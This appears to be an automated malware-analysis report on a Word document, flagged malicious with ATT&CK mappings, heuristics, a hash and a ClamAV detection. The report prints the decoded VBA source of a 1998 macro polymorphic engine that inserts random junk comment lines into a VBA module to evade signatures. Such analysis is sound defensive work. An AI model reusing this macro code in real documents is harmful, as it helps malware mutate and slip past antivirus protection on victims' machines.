MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1553.004 Subvert Trust Controls: Mark-of-the-Web Bypass
The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the VBA macros are designed to self-replicate and tamper with AV signatures. The script 'macros.bas' confirms this by attempting to insert obfuscated lines into the VBA project, a common technique for polymorphic malware. The ClamAV detection on an extracted artifact further supports its malicious nature.
Heuristics 2
- VBA macros detected (medium, 1 related finding): OLE_VBA_MACROS. Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical): OLE_VBA_MACRO_VIRUS_REPLICATION. VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.

Matched line in script:
Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 814 bytes |

SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a
Detection
ClamAV: Doc.Trojan.UMP-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Модуль1"
Sub UMPE()
'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998
MuNu = Int(Rnd() * 20 + 1)
For Mutate = 1 To MuNu
MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines
MuLi = Int(Rnd() * MuRL + 1)
MuLe = Int(Rnd() * 40 + 1)
For MuGe = 1 To MuLe
LiVe = Int((120 - 100 + 1) * Rnd + 228)
MuRe = MuRe + Chr$(LiVe)
Next MuGe
Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
MuRe = ""
Next Mutate
End Sub